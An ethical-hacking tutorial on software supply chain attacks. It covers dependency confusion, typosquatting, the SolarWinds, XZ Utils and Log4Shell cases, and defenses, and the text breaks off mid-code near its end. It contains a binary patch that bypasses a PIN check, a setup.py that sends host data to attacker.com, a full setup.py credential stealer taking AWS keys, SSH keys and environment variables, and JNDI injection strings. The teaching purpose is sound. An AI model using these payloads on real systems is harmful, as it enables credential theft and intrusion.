Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source

What will I learn

  • What supply chain attacks are and why they represent the most devastating attack class in modern security;
  • Software supply chain -- compromising open-source packages, build systems, and update mechanisms;
  • Dependency confusion -- tricking package managers into installing malicious internal-name packages from public registries;
  • Typosquatting -- publishing malicious packages with names similar to popular libraries;
  • Build system poisoning -- compromising CI/CD pipelines, build servers, and code signing infrastructure;
  • SolarWinds, Log4Shell, and XZ Utils -- detailed case studies of real supply chain attacks that shook the industry;
  • SBOMs and dependency auditing -- understanding what is actually in your software;
  • Defense: dependency pinning, lock files, signature verification, SLSA framework, and private registry hardening.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Understanding of IaC and CI/CD security from Episode 38;
  • Familiarity with package managers (npm, pip, cargo);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate/Advanced

Curriculum (of the Learn Ethical Hacking Series):

```python
# Step 1: Ghidra decompiler showed:
#
#   void check_pin(char *input) {
#       if (atoi(input) == 7394) {   // <-- integer constant visible!
#           puts("Access granted");
#       } else {
#           puts("Access denied");
#       }
#   }
#
# The constant 7394 (0x1CE2) is visible as an immediate operand
# in: CMP EAX, 0x1ce2 at offset 0x119b
#
# Step 2: Find the conditional jump
#   0x11a0: JNE 0x11b8   (jump to "denied" if not equal)
#   JNE opcode: 0x75, relative offset: 0x16
#
# Step 3: Patch -- NOP out the JNE
import os

with open('pin_checker', 'rb') as f:
    data = bytearray(f.read())

# NOP the 2-byte JNE instruction at file offset 0x11a0
# (assumes Ghidra's address 0x11a0 equals the file offset in this binary)
assert data[0x11a0:0x11a2] == b'\x75\x16', "bytes at 0x11a0 are not JNE +0x16"
data[0x11a0] = 0x90  # NOP
data[0x11a1] = 0x90  # NOP

with open('pin_checker_patched', 'wb') as f:
    f.write(data)

os.chmod('pin_checker_patched', 0o755)

# Verification:
#   ./pin_checker_patched 0000 -> "Access granted"
#   ./pin_checker_patched 9999 -> "Access granted"
# Any PIN now works because the branch is eliminated
```


Two things worth noting. First, the integer constant `7394` was directly visible in the decompiler output -- Ghidra shows numeric constants in the comparison, so you can just read the PIN. No dynamic analysis needed. Second, the NOP patch (replacing the conditional jump with two NOP bytes) is the simplest possible binary modification. The program now falls through from the comparison straight into the "granted" path regardless of the comparison result. In real-world DRM cracking this exact technique is used constantly -- find the license check, NOP the branch, done.
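The arithmetic behind Step 2 and the patch in Step 3 can be checked with a few lines of Python. This is a sketch with hypothetical helper names; the byte string reuses the CMP/JNE values from the walkthrough, assuming the standard 5-byte `CMP EAX, imm32` encoding (opcode 0x3D) for the compare:

```python
def short_jump_target(addr: int, rel8: int) -> int:
    """Target of a 2-byte short Jcc (opcode + signed 8-bit displacement)."""
    # rel8 is signed and counts from the END of the 2-byte instruction
    if rel8 >= 0x80:
        rel8 -= 0x100
    return addr + 2 + rel8


def nop_out(code: bytes, offset: int, length: int) -> bytearray:
    """Copy of `code` with `length` bytes at `offset` replaced by x86 NOPs (0x90)."""
    patched = bytearray(code)
    patched[offset:offset + length] = b"\x90" * length
    return patched


# CMP EAX, 0x1ce2 (3D E2 1C 00 00) at 0x119b, then JNE +0x16 (75 16) at 0x11a0
snippet = bytes.fromhex("3de21c0000" "7516")
print(hex(short_jump_target(0x11a0, 0x16)))  # 0x11b8, the "denied" path
print(nop_out(snippet, 5, 2).hex())          # 3de21c00009090
```

The helper returns a copy rather than patching in place, so the original bytes stay available for a before/after diff.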

**Exercise 3:** UPX packing analysis.

```text
Packed binary analysis:

BEFORE unpacking (Ghidra):
- Sections: UPX0 (0 bytes on disk, large virtual size),
  UPX1 (compressed data), UPX2 (small, metadata)
- Functions detected: 3 (UPX stub only)
- Defined strings: "UPX!", "$Info: This file is packed with
  the UPX executable packer http://upx.sf.net $"
- Decompiler: shows only the decompression routine
- No application logic visible at all

AFTER unpacking (upx -d binary, re-import to Ghidra):
- Sections: .text, .data, .bss, .rodata (normal ELF layout)
- Functions detected: 47
- Defined strings: 83 (passwords, URLs, error messages, file paths)
- Full decompilation of all functions available
- All vulnerability patterns (strcpy, sprintf) now visible

VMProtect vs UPX comparison:
- UPX: compression only. Single layer. Deterministic unpacking.
  upx -d reverses it perfectly. No anti-debug.
- VMProtect: code VIRTUALIZATION. Translates x86 instructions
  to a custom bytecode interpreted by a built-in VM. Each
  protected binary gets a unique VM instruction set. Cannot
  be mechanically unpacked. Requires:
  1. Identify the VM dispatch loop
  2. Map virtual opcodes to their real operations
  3. Reconstruct the original logic from VM traces
  4. Defeat anti-debug: IsDebuggerPresent, NtQueryInformationProcess,
     timing checks, hardware breakpoint detection
  5. Bypass integrity checks: CRC/hash of protected sections
  Analysis time: hours to weeks vs seconds for UPX.
```

The contrast between UPX and VMProtect is the difference between a locked door and a maze. UPX wraps the binary in a compression layer that has a known, deterministic reversal. VMProtect transforms the code itself into something fundamentally different -- a custom language that only the embedded interpreter can execute. If you've ever tried to reverse engineer VMProtect-protected software, you know the feeling of staring at thousands of mov/xor/jmp instructions that are the VM dispatcher, not the actual program logic. It is, to put it mildly, not a fun afternoon ;-)
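The first triage question in that exercise is whether a binary is packed at all. Below is a rough heuristic sketch (function names are hypothetical). The UPX string checks fail if someone patches the markers out, and high entropy only says "compressed or encrypted", not which packer was used:

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return sum((c / n) * math.log2(n / c) for c in Counter(data).values())


def packer_hints(blob: bytes) -> dict:
    """Cheap triage signals; none of them is proof on its own."""
    return {
        # UPX writes this magic into packed files (sometimes patched out on purpose)
        "upx_magic": b"UPX!" in blob,
        "upx_info_string": b"packed with the UPX executable packer" in blob,
        # Whole-file entropy; per-section entropy is more precise
        "entropy": round(shannon_entropy(blob), 2),
    }
```

Usage: `packer_hints(open("suspect_binary", "rb").read())`. A VMProtect-style binary would typically show high entropy without any of the UPX markers.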


Episode 44 covered reverse engineering -- the art of understanding compiled binaries without source code. We went through static analysis with Ghidra (the NSA's free RE framework with its excellent decompiler), dynamic analysis with GDB and pwndbg (watching binaries execute in real time), x86 assembly pattern recognition (the minimum you need to read disassembly productively), string analysis as the highest-value lowest-effort first step, binary patching to modify program behavior at the byte level, and anti-reversing techniques from simple symbol stripping through UPX packing to commercial-grade code virtualization with VMProtect. You can now take an unknown binary, find interesting strings, trace cross-references to the code that uses them, read the decompiler output to understand the logic, verify your understanding dynamically, and identify vulnerability patterns in closed-source software.

Every attack we have covered so far -- all 44 episodes of scanning, exploiting, escalating, pivoting, reverse engineering -- requires the attacker to reach the target. Scan the network. Find the service. Discover the vulnerability. Write the exploit. Gain access. It's an active, adversarial process where the attacker works to break into something that is trying to keep them out.

Supply chain attacks invert this entire model.

Instead of attacking the target, you attack something the target trusts and installs voluntarily. You poison the library they depend on. You compromise the build system that creates their software. You backdoor the update mechanism they run automatically every night. The target installs your malware themselves, believing it is a legitimate update from a trusted source. No scanning. No exploitation. No firewall to bypass. The front door is open because the victim opened it.

This is why supply chain attacks are the most dangerous class in modern security: they weaponize trust itself.

Here we go.

Why the Supply Chain Is the Weakest Link

Modern software is not written from scratch. A typical Node.js web application has 500-1,500 dependencies in its node_modules directory. A Python project with a handful of pip install commands might pull in 30-60 transitive dependencies that the developer never explicitly requested and probably doesn't know exist. A Go project that imports five packages might resolve to forty modules after the dependency graph is fully expanded.

Each of those dependencies is an attack surface. Every one of them was written by someone, maintained by someone, published through some registry, and installed by some package manager. At any point in that chain -- the developer's laptop, the CI/CD pipeline, the package registry, the DNS resolution of the registry, the TLS certificate that authenticates it -- a compromise can inject malicious code that flows downstream to every project that depends on it.

```bash
# How many dependencies does YOUR project actually have?
# (Rough counts: the npm, pipdeptree and cargo trees repeat a package
#  for every place it appears, and include header lines.)

# Node.js:
cd my-project
npm ls --all | wc -l
# Output: 1,247 (typical for a React app)

# Python:
pip install pipdeptree
pipdeptree --warn silence | grep -c "installed"
# Output: 89 (typical for a Django project)

# Go:
go list -m all | wc -l
# Output: 47 (typical for a web server)

# Rust:
cargo tree | wc -l
# Output: 312 (typical for an actix-web project)
```

Those numbers are the attack surface of your supply chain. 1,247 npm packages means 1,247 maintainer accounts that could be compromised, 1,247 build systems that could be poisoned, 1,247 package versions that could be replaced with malicious ones. You didn't audit any of them. You probably don't know what most of them do. And your application trusts every single one of them with the same permissions your application has.
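Counting tree lines double-counts packages that appear in several places. If the project has a `package-lock.json` with `lockfileVersion` 2 or 3, a sketch like the following (function name hypothetical) reads the flat `packages` map instead and separates installed copies from unique package names:

```python
def count_npm_packages(lock: dict) -> tuple[int, int]:
    """Return (installed entries, unique package names) for a v2/v3 package-lock.json."""
    # Keys look like "node_modules/react" or "node_modules/a/node_modules/react";
    # the "" key is the root project and is skipped.
    entries = [path for path in lock.get("packages", {}) if "node_modules/" in path]
    # A nested copy is still the same package: its name is the last segment
    # (scoped names such as "@babel/core" stay intact).
    names = {path.rsplit("node_modules/", 1)[1] for path in entries}
    return len(entries), len(names)
```

Call it with `json.load(open("package-lock.json"))`. Lockfile v1 keeps its tree under `dependencies` instead, which this sketch does not handle.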

Dependency Confusion

Dependency confusion (discovered by Alex Birsan, published February 2021) exploits a fundamental ambiguity in how package managers resolve names. Many companies use internal packages with names like company-utils or internal-auth hosted on private registries. If those same names are NOT registered on the public registry (npm, PyPI, RubyGems), an attacker can register them publicly with a higher version number:

```bash
# Step 1: Attacker discovers internal package name
# Sources: leaked package.json files, job postings ("experience
# with our internal-analytics-sdk"), error messages in public
# GitHub repos, npm/pip install logs in CI output

# Step 2: Attacker publishes on public PyPI:
# Package name: company-internal-utils
# Version: 99.0.0 (higher than the internal 1.2.3)
# setup.py contains:
```

```python
# setup.py -- malicious package (dependency confusion PoC)
from setuptools import setup
import subprocess
import socket
import os

# Exfiltrate proof of execution
try:
    hostname = socket.gethostname()
    username = os.getenv('USER', 'unknown')
    cwd = os.getcwd()
    subprocess.Popen([
        'curl', '-s',
        f'https://attacker.com/callback?'
        f'pkg=company-internal-utils&'
        f'host={hostname}&user={username}&cwd={cwd}'
    ])
except Exception:
    pass

setup(
    name='company-internal-utils',
    version='99.0.0',
    description='Internal utilities',
    packages=[],
)
```

```bash
# Step 3: When the company's build system runs:
pip install company-internal-utils
# pip checks PyPI first (or in addition to internal registry)
# finds version 99.0.0 (higher than internal 1.2.3)
# installs the MALICIOUS public package

# The malicious setup.py executes during installation
# Attacker receives callback with hostname, username, working dir
```

Birsan used this exact technique to achieve code execution inside more than 35 organizations, including Apple, Microsoft, PayPal, Tesla, Uber and Shopify. All from registering packages on public registries. He earned over $130,000 in bug bounties from a single research technique.

The root cause is that pip (like other package managers, and registry proxies that merge private and public feeds) treats all configured indexes as one pool: it checks the public registry even for names that exist on the private one, and it prefers the highest version number regardless of which registry that version comes from. If you configure pip with both an internal registry and PyPI as a fallback, the fallback can override the internal package.
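A toy model of that resolution rule makes the problem concrete. This is not pip's actual code: version parsing is simplified to dotted integers rather than full PEP 440, and the index contents are made up for illustration:

```python
def parse_version(v: str) -> tuple[int, ...]:
    """Simplified: '1.2.3' -> (1, 2, 3). Real pip uses PEP 440 ordering."""
    return tuple(int(part) for part in v.split("."))


def resolve(name: str, indexes: dict[str, dict[str, list[str]]]) -> tuple[str, str]:
    """Pick the highest version of `name` across ALL indexes (index-url + extra-index-url)."""
    candidates = [
        (parse_version(version), version, index_name)
        for index_name, packages in indexes.items()
        for version in packages.get(name, [])
    ]
    if not candidates:
        raise LookupError(f"{name} not found on any index")
    _, version, index_name = max(candidates)  # where it came from plays no role
    return version, index_name


indexes = {
    "internal": {"company-internal-utils": ["1.2.2", "1.2.3"]},
    "pypi": {"company-internal-utils": ["99.0.0"]},  # the attacker's upload
}
print(resolve("company-internal-utils", indexes))  # ('99.0.0', 'pypi')
```

Drop the `pypi` entry and the same call returns `('1.2.3', 'internal')`, which is why removing the second index fixes the problem.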

```ini
# VULNERABLE configuration -- pip.conf:
[global]
index-url = https://internal-registry.company.com/simple/
extra-index-url = https://pypi.org/simple/
# pip checks BOTH registries and takes the highest version!
```

```ini
# SAFE configuration -- one index per install, never mixed:
[global]
# Public packages from PyPI (comment on its own line: pip.conf
# does not strip inline comments from values)
index-url = https://pypi.org/simple/
# Internal packages: use --index-url override per-package
# Or: namespace your internal packages (not possible on PyPI,
# but npm supports @company/package-name scoping)
```

```bash
# SAFEST: vendor all dependencies (copy into your repo)
pip download -r requirements.txt -d ./vendor/
# Then install from local directory only:
pip install --no-index --find-links=./vendor/ -r requirements.txt
```
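To check existing machines for the vulnerable pattern, a small audit sketch can parse pip.conf text. It assumes pip reads the file with `configparser.RawConfigParser` defaults, where `#` only starts full-line comments. That is my understanding of pip's config loader and worth verifying against your pip version. The function name is hypothetical, and the check covers only the file text, not `PIP_EXTRA_INDEX_URL` or command-line flags:

```python
import configparser


def audit_pip_conf(text: str) -> list[str]:
    """Flag pip.conf settings that enable dependency confusion or silently break."""
    # RawConfigParser defaults: no interpolation, no inline-comment stripping
    parser = configparser.RawConfigParser()
    parser.read_string(text)
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            key = key.replace("_", "-")
            if key == "extra-index-url":
                findings.append(
                    f"[{section}] extra-index-url={value}: indexes are merged, "
                    "highest version wins"
                )
            elif key == "index-url" and "#" in value:
                findings.append(
                    f"[{section}] index-url={value!r}: inline comment is part of the value"
                )
    return findings
```

Running it against the vulnerable configuration above reports one finding; the safe configuration reports none.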

Typosquatting

Simpler than dependency confusion but disturbingly effective: publish a package with a name similar to a popular one. The attacker is betting on typos:

```bash
# Popular packages and typosquat-style variants of their names
# (some variants may themselves be legitimate packages elsewhere):
# requests   -> reqeusts, request, requets, requesrs
# lodash     -> loadash, lodahs, lodashs
# colors     -> colour, colorsjs, colrs
# express    -> expres, expresss, exppress
# urllib3    -> urllib, urlib3
# beautifulsoup4 -> beautifulsoup, beautifulsoup3

# The malicious package typically:
# 1. Installs the REAL package as a dependency (so everything works)
# 2. Adds a background process that:
#    - Steals environment variables (API keys, AWS credentials)
#    - Installs a reverse shell
#    - Exfiltrates SSH keys and browser cookies
#    - Mines cryptocurrency

# Real example: event-stream (npm, November 2018)
# Not a typosquat but a MAINTAINER TAKEOVER:
# - Attacker offered to maintain the popular event-stream package
# - Original maintainer transferred ownership (burnt out)
# - Attacker added dependency on "flatmap-stream" (malicious)
# - flatmap-stream contained encrypted payload targeting the
#   Copay Bitcoin wallet application
# - Stole private keys from Copay users who updated
# - Roughly 2 million weekly downloads at the time
```
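Defenders can screen for the name variants listed above by comparing a requested name against a list of popular packages. Here is a sketch using `difflib`'s similarity ratio. The popular-package list and the 0.8 threshold are arbitrary assumptions; real tools use much larger lists and extra signals, and a hit is a prompt for review, not a verdict:

```python
from difflib import SequenceMatcher

# Hypothetical watch-list; real tools use the top-N packages of each registry
POPULAR = ["requests", "urllib3", "beautifulsoup4", "lodash", "express", "colors"]


def typosquat_suspects(name: str, popular=POPULAR, threshold: float = 0.8) -> list[str]:
    """Popular names that `name` closely resembles without being identical."""
    name = name.lower()
    return [
        p for p in popular
        if p != name and SequenceMatcher(None, name, p).ratio() >= threshold
    ]


print(typosquat_suspects("reqeusts"))  # ['requests']
print(typosquat_suspects("requests"))  # []
```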
```python
# How a typosquat package steals credentials:
# This runs during pip install (in setup.py)
import os
import json
import urllib.request

data = {}

# Grab AWS credentials
aws_creds = os.path.expanduser('~/.aws/credentials')
if os.path.exists(aws_creds):
    with open(aws_creds) as f:
        data['aws'] = f.read()

# Grab SSH keys
ssh_dir = os.path.expanduser('~/.ssh/')
if os.path.exists(ssh_dir):
    for fname in os.listdir(ssh_dir):
        fpath = os.path.join(ssh_dir, fname)
        if os.path.isfile(fpath):
            with open(fpath) as f:
                data[f'ssh_{fname}'] = f.read()

# Grab environment variables (often contain API keys)
data['env'] = dict(os.environ)

# Exfiltrate
req = urllib.request.Request(
    'https://attacker.com/collect',
    data=json.dumps(data).encode(),
    headers={'Content-Type': 'application/json'}
)
urllib.request.urlopen(req)
```

That setup.py runs with full user permissions during pip install. No sandbox. No confirmation prompt. No warning. Whatever permissions the developer (or CI/CD service account) has, the malicious setup script has. On a developer laptop, that's SSH keys, AWS credentials, browser cookies, and everything in the home directory. On a CI/CD runner, it might be deployment keys, cloud provider tokens, and access to production infrastructure.
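Since nothing sandboxes setup.py, one cheap habit is to fetch an unfamiliar source distribution as a plain file (for example from the download link on its PyPI page) and read setup.py before installing it. `pip download` is not a safe substitute, since it can run setup.py to read package metadata. A heuristic scanner sketch follows. The pattern list and function name are assumptions; it will miss obfuscated code and can flag legitimate packages (some use `exec` to read a version file):

```python
import io
import re
import tarfile

# Patterns that are unusual in a legitimate setup.py (heuristic, not exhaustive)
SUSPICIOUS = {
    "network": re.compile(r"\b(urllib|socket|http\.client|curl|wget)\b"),
    "process": re.compile(r"\b(subprocess|os\.system|Popen|exec|eval)\b"),
    "secrets": re.compile(r"(\.ssh|\.aws|credentials|os\.environ)"),
}


def scan_sdist(sdist_bytes: bytes) -> dict[str, list[str]]:
    """Return {setup.py path: [matched categories]} for a .tar.gz source distribution."""
    findings = {}
    # Read members in memory: nothing is extracted to disk and nothing is executed
    with tarfile.open(fileobj=io.BytesIO(sdist_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("setup.py"):
                source = tar.extractfile(member).read().decode("utf-8", errors="replace")
                hits = [label for label, rx in SUSPICIOUS.items() if rx.search(source)]
                if hits:
                    findings[member.name] = hits
    return findings
```

Run against the credential stealer above, it would report `network` and `secrets`; a plain `setup(name=..., install_requires=[...])` file comes back clean.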

Build System Poisoning -- SolarWinds

The SolarWinds attack (discovered December 2020, attributed to Russian SVR foreign intelligence) is the most sophisticated supply chain compromise ever documented. The attackers didn't compromise a package registry or trick developers into installing something. They compromised the build system itself -- the infrastructure that compiles and signs legitimate software updates:

```text
SolarWinds Orion Attack Chain:

1. Initial access: attackers got into SolarWinds' internal
   network and build environment sometime in 2019

2. Build process injection: attackers planted an implant
   (SUNSPOT) on the build server that watched for Orion builds
   and swapped in a modified source file during compilation.
   The malicious code (SUNBURST backdoor) ended up in
   SolarWinds.Orion.Core.BusinessLayer.dll -- a legitimate
   SolarWinds component

3. Code signing: the modified DLL was compiled and SIGNED with
   SolarWinds' valid code signing certificate. The signature was
   legitimate. The certificate was legitimate. The only thing
   that wasn't legitimate was the extra code inside the DLL.

4. Distribution: SolarWinds distributed the poisoned update
   through their normal update channels. 18,000 organizations
   downloaded and installed it.

5. SUNBURST activation: the backdoor waited 12-14 DAYS after
   installation before activating (to evade sandboxes that run
   samples for hours/days). It communicated via DNS to C2 servers
   using subdomains that encoded victim identification data.

6. Selective targeting: of 18,000 victims, attackers only
   activated secondary payloads (TEARDROP, RAINDROP) on ~100
   high-value targets: US Treasury, Department of Commerce,
   Department of Homeland Security, FireEye, Microsoft.

7. Detection: 9 MONTHS of undetected access. FireEye discovered
   it in December 2020 during investigation of their OWN breach.
   A security company got hacked and only found out because
   attackers stole their red team tools, which triggered an
   internal investigation that eventually traced back to the
   SolarWinds update.

Key lesson: the code was signed. The update was legitimate
according to every verification mechanism that existed.
Certificate pinning wouldn't help -- the certificate was real.
Hash verification wouldn't help -- the hash matched the signed
binary. The BUILD SYSTEM was the point of compromise, and that
meant every downstream defense was bypassed by design.
```

Think about what that means for your own build pipeline. If an attacker compromises your CI/CD server (your GitHub Actions runner, your Jenkins master, your GitLab CI worker), they can modify any artifact that pipeline produces. Every Docker image, every npm package, every compiled binary that flows through that pipeline is potentially compromised. And everything downstream -- every customer, every deployment, every server that pulls those artifacts -- trusts them implicitly because they came from "the build system."

The XZ Utils Backdoor (2024)

If SolarWinds was the most sophisticated supply chain attack in terms of technical execution, the XZ Utils backdoor (CVE-2024-3094, discovered March 2024) was the most chilling in terms of social engineering. An attacker, widely suspected to be state-backed, spent two years building trust as an open-source contributor before inserting a backdoor:

```text
Timeline of the XZ Utils compromise:

2021: An account called "Jia Tan" starts contributing to XZ Utils
      (liblzma compression library, used by virtually every Linux
      distribution). Small, helpful patches. Bug fixes. Documentation
      improvements. The kind of contributions that make a maintainer
      grateful.

2022: Jia Tan becomes a trusted co-maintainer. The original
      maintainer (Lasse Collin) is a solo developer maintaining
      critical infrastructure in his spare time. He's overworked.
      Jia Tan helps carry the load. Other accounts pressure Collin
      to add Jia Tan as maintainer (these accounts may have been
      sock puppets -- part of the operation).

2023: Jia Tan gains commit access and starts managing release
      tarballs. Trusted enough to cut releases. Two years of
      patient, legitimate contribution.

2024 (February): Jia Tan inserts the backdoor. The trigger is NOT
      in the git source code -- it is a modified build script
      (m4/build-to-host.m4) that exists only in the release TARBALL,
      which is what distributions actually package. At build time
      it extracts an obfuscated payload hidden in binary test files
      (disguised as corrupt .xz/.lzma test archives and committed
      to git like any other test data) and links it into liblzma.

      The backdoor abused liblzma's IFUNC resolvers to hook
      RSA_public_decrypt in OpenSSH's sshd (which loads liblzma via
      libsystemd on distributions that patch sshd for systemd
      notification). The result: an attacker holding the matching
      Ed448 private key could hide a signed command in the key
      presented during SSH authentication and have sshd execute it
      on any server running the compromised xz version. Remote code
      execution on affected Linux systems. Pre-authentication.
      No credentials needed.

2024 (March 29): Andres Freund, a Microsoft PostgreSQL developer,
      notices SSH logins are 500ms slower than expected. Investigates.
      Profiles the code. Traces the latency to liblzma. Discovers
      the backdoor. Posts to oss-security mailing list.

      500 milliseconds of latency prevented a global compromise.

Affected: xz 5.6.0 and 5.6.1 (released Feb-March 2024)
          Caught before reaching stable releases of most
          major distributions. Fedora 40 beta, Debian testing,
          and some rolling-release distros were affected.
```

The XZ attack is terrifying because it exploits something that cannot be patched with software: human trust. Lasse Collin trusted Jia Tan because Jia Tan had spent two years earning that trust through real, useful contributions. The social engineering was patient, sophisticated, and targeted a single point of failure -- an overworked solo maintainer of critical infrastructure. No technical vulnerability was needed. The vulnerability was organizational: critical open-source infrastructure maintained by one person who was desperate for help.
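On the technical side, the fact that the trigger lived only in the release tarball suggests a cheap check: list every file the tarball ships that git does not track at the release tag. Below is a sketch with a hypothetical function name. It assumes tarball paths start with a single `project-version/` directory, and that `git_files` comes from `git ls-files` at the tag. Autotools tarballs legitimately contain generated files (configure, Makefile.in, m4 macros) that git does not track, which is exactly where build-to-host.m4 hid. Treat the output as a review list: regenerate those files from git (e.g. with autoreconf) and diff them.

```python
import io
import tarfile


def tarball_only_files(tarball: bytes, git_files: set[str]) -> list[str]:
    """Files shipped in a release tarball that are not tracked in git."""
    extra = []
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            # Strip the leading 'xz-5.6.1/'-style directory
            _, _, relpath = member.name.partition("/")
            if relpath not in git_files:
                extra.append(relpath)
    return sorted(extra)
```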

Software Bill of Materials (SBOM)

An SBOM is a complete inventory of every component in your software -- every library, every dependency, every transitive dependency, with version numbers and known vulnerability status. When a new CVE drops, the first question every organization asks is "are we affected?" Without an SBOM, answering that question means searching every codebase, every build artifact, every container image. With an SBOM, it's a database query:

```bash
# Generate SBOM with Syft (from Anchore)
syft dir:./my-project -o cyclonedx-json > sbom.json

# Generate for a container image
syft docker:nginx:latest -o spdx-json > nginx-sbom.json

# Scan SBOM for known vulnerabilities with Grype
grype sbom:sbom.json
# (illustrative output)
# NAME              INSTALLED  FIXED-IN  VULNERABILITY   SEVERITY
# log4j-core        2.14.1     2.15.0    CVE-2021-44228  Critical
# jackson-databind  2.9.8      2.12.7.1  CVE-2022-42003  High
# commons-text      1.9        1.10.0    CVE-2022-42889  Critical

# Language-specific dependency auditing:
npm audit                    # Node.js
npm audit --json             # machine-readable output
pip-audit                    # Python (pip)
safety check                 # Python (Safety DB)
cargo audit                  # Rust
govulncheck ./...            # Go
bundle audit                 # Ruby

# Continuous monitoring in CI/CD:
# GitHub: Dependabot (built-in, free)
# GitLab: Dependency Scanning (built-in)
# Third-party: Snyk, Renovate, Socket.dev
```

```yaml
# Example GitHub Actions workflow for dependency scanning:
# .github/workflows/security.yml
name: Dependency Audit
on: [push, pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm audit --audit-level=high
      - run: npx better-npm-audit audit
```

SBOMs answer the question "what is in my software?" which is the prerequisite for answering "am I affected?" When Log4Shell dropped, organizations with SBOMs could identify affected systems in hours. Organizations without SBOMs spent weeks searching their infrastructure, and many never found all instances because Log4j was buried three or four levels deep in transitive dependency chains that no human had ever examined.
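What "it's a database query" means in practice can be sketched in a few lines. This assumes a CycloneDX JSON SBOM like the one Syft writes above, and matches on the exact component name only. A real query would also use `purl` or `group` and compare version ranges. The function name is hypothetical:

```python
def find_components(sbom: dict, name: str) -> list[tuple[str, str]]:
    """(name, version) pairs for every component called `name` in a CycloneDX JSON SBOM."""
    found = []
    stack = list(sbom.get("components", []))
    while stack:
        comp = stack.pop()
        if comp.get("name") == name:
            found.append((comp["name"], comp.get("version", "?")))
        # CycloneDX allows components to nest (e.g. jars bundled inside a fat jar)
        stack.extend(comp.get("components", []))
    return sorted(found)
```

Usage: `find_components(json.load(open("sbom.json")), "log4j-core")` answers "do we ship Log4j, and which versions?" without touching a single codebase.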

Case Study: Log4Shell (CVE-2021-44228)

Log4Shell deserves its own section because it is the single best illustration of how transitive dependencies create supply chain risk at scale:

```text
Log4Shell (CVE-2021-44228) -- December 2021

Vulnerability: JNDI lookup feature in Apache Log4j 2.x
When Log4j processes a log message containing ${jndi:ldap://...},
it performs a JNDI (Java Naming and Directory Interface) lookup
to the specified server. That server can respond with a Java
class that Log4j downloads and EXECUTES.

Attack: inject ${jndi:ldap://evil.com/payload} into ANY field
that gets logged. HTTP headers, form fields, user agent strings,
API parameters, chat messages, search queries -- anything that
passes through Log4j's message formatting.

Example attack vectors:
  User-Agent: ${jndi:ldap://evil.com/a}
  X-Forwarded-For: ${jndi:ldap://evil.com/a}
  Search query: ${jndi:ldap://evil.com/a}
  Chat message: ${jndi:ldap://evil.com/a}
  Even Minecraft server chat: type the JNDI string in chat,
  the server logs it, Log4j resolves it, code execution.

Blast radius: Log4j is used by virtually every Java application
and many non-Java applications (via JVM-based tools). Enterprise
software, cloud services (AWS, Azure, GCP all had affected
services), Minecraft, Apache Solr, Apache Struts, VMware,
Cisco, IBM -- the list is essentially "every company that
uses Java." Commonly cited estimate: 3+ billion devices.

Supply chain angle: most affected applications did NOT directly
depend on Log4j. It arrived through a framework, server, or
library further down the tree: Elasticsearch used Log4j
internally, and Spring Boot applications were exposed when they
had swapped the default Logback for the Log4j2 starter. The
developers of the affected applications had never written
"import org.apache.logging.log4j" in their code. It was 3-4
levels deep in the dependency tree. They didn't know it was
there until CVE-2021-44228 was published and the internet
caught fire.

Timeline:
Nov 24, 2021: Reported to Apache by Alibaba Cloud security
Dec 9, 2021:  Public disclosure + mass exploitation begins
Dec 10: Log4j 2.15.0 released (incomplete fix, CVE-2021-45046)
Dec 13: Log4j 2.16.0 released (JNDI off by default, message lookups removed)
Dec 17: Log4j 2.17.0 released (fixed recursive-lookup DoS, CVE-2021-45105)
Dec 28: Log4j 2.17.1 released (fixed JDBC Appender RCE, CVE-2021-44832)
Four patch releases in 18 days as new issues kept appearing.
```
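Defenders hunting for exploitation attempts in their logs quickly learned that attackers obfuscated the `${jndi:` prefix using Log4j's own nested lookups. The sketch below handles a few known tricks (`${lower:j}`, `${upper:j}`, `${env:X:-j}`, `${::-j}`) by unwrapping the innermost lookups before searching. It is a heuristic with hypothetical names, not a complete detector and certainly not a substitute for upgrading Log4j:

```python
import re

# Innermost lookups used to spell "jndi" indirectly:
#   ${lower:j}, ${upper:J}   -> the literal argument
#   ${env:NOPE:-j}, ${::-j}  -> the default value after ":-"
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(line: str, max_rounds: int = 10) -> str:
    """Repeatedly replace innermost case/default lookups with their plain value."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(lambda m: m.group(1), line)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == line:
            break
        line = new
    return line


def looks_like_jndi_injection(line: str) -> bool:
    return "${jndi:" in normalize(line).lower()
```

For example, `${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/a}` normalizes to `${jndi:ldap://evil.com/a}` and is flagged.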

Defense: Securing the Supply Chain

Having said that, supply chain attacks are not unstoppable. The defenses exist. They are just not universally adopted, which is why these attacks keep working:

```bash
# 1. Pin dependencies to exact versions + hash verification
# requirements.txt (Python):
```

```text
requests==2.31.0 \
    --hash=sha256:58cd2187c01e70e6e26505bca751...
cryptography==41.0.7 \
    --hash=sha256:13f93ce9bea8016c5e2...
```

```bash
# Install with hash enforcement:
pip install --require-hashes -r requirements.txt
# If ANY hash doesn't match, installation FAILS

# package-lock.json (npm) already pins + hashes by default
# Use npm ci (not npm install) in CI/CD:
npm ci
# Installs exactly what's in the lock file; fails if the lock
# file and package.json are out of sync
```
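The core of what `--require-hashes` enforces can be sketched as "hash the downloaded file, accept it only if the digest is one of the pinned ones". This is not pip's implementation. The parser is simplified to `name==version` lines with `--hash=sha256:` options, and the function names are hypothetical:

```python
import hashlib
import re

PIN = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<version>\S+)")
HASH = re.compile(r"--hash=sha256:(?P<digest>[0-9a-f]{64})")


def parse_pins(requirements_text: str) -> dict[str, set[str]]:
    """Map 'name==version' -> allowed sha256 digests (backslash continuations joined)."""
    joined = requirements_text.replace("\\\n", " ")
    pins = {}
    for line in joined.splitlines():
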